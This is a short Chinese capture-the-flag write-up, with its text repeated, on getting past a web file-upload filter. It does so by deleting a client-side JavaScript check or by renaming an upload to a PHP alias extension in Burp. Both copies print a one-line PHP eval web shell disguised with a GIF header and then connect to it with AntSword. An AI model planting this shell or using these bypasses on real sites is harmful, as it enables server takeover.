这个题我有两个思路。
1.绕过前端Js验证,phtml拓展名的应用
首先打开之后,写一个phtml文件
GIF89a <script language="php">eval($_POST['shell']);</script>
发现不允许上传phtml文件
猜想有js验证
F12查看
果然,将其删除
蚁剑连接,
根目录有flag.
2.php别名绕过
随意上传一个a.jpg,bp抓包,修改后缀名,改码,添加代码,放回
蚁剑链接,根目录,flag
这个题我有两个思路。
1.绕过前端Js验证,phtml拓展名的应用
首先打开之后,写一个phtml文件
GIF89a <script language="php">eval($_POST['shell']);</script>
发现不允许上传phtml文件
猜想有js验证
F12查看
果然,将其删除
蚁剑连接,
根目录有flag.
2.php别名绕过
随意上传一个a.jpg,bp抓包,修改后缀名,改码,添加代码,放回
蚁剑链接,根目录,flag